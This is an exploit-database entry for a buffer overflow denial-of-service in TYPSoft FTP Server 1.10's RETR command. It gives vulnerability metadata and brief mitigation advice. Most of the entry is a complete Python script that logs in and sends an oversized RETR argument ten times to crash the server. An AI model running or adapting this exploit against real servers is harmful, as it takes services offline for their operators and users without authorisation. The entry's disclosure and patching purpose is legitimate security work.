TYPSoft FTP Server RETR Command DoS

vendor:

FTP Server

by:

Jeremiah Talamantes

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: FTP Server

Affected Version From: 1.10

Affected Version To: 1.10

Patch Exists: YES

Related CWE: N/A

CPE: a:typsoft:ftp_server:1.10

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP, SP2 (EN)

2009

TYPSoft FTP Server RETR Command DoS

This exploit is a buffer overflow vulnerability in the RETR command of TYPSoft FTP Server. It allows an attacker to cause a denial of service by sending a large amount of data to the server. The exploit does not require a PORT command to be specified.

Mitigation:

Upgrade to the latest version of TYPSoft FTP Server, or use an alternative FTP server.

Source

Exploit-DB raw data:

# Tested on: Windows XP, SP2 (EN)

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TYPSoft FTP Server RETR Command DoS             ##"
print "##                        Version 1.10                         ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Description:
# RETR command overflow with no PORT specified

# Define the exploit's usage
def Usage():
    print ("Usage: scriptname.py <IP> <username> <password>\n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security : www.redteamsecure.com/labs\n")

# Buffer
buffer="AAAA" * 496

def exploit(hostname,username,password):
	i=0
	while i < 10:
		i=i+1
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			sock.connect((hostname, 21))
		except:
			print ("Error: unable to connect to host")
			sys.exit(1)
		r=sock.recv(1024)
		print "[+] " + r + ": iteration number:  ",i
		sock.send("USER " + username + "\r\n")
		r=sock.recv(1024)
		sock.send("PASS " + password + "\r\n")
		r=sock.recv(1024)
		sock.send("RETR " + buffer + "\r\n")
		sock.close()
		
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    exploit(hostname,username,password)
    sys.exit(0)

# End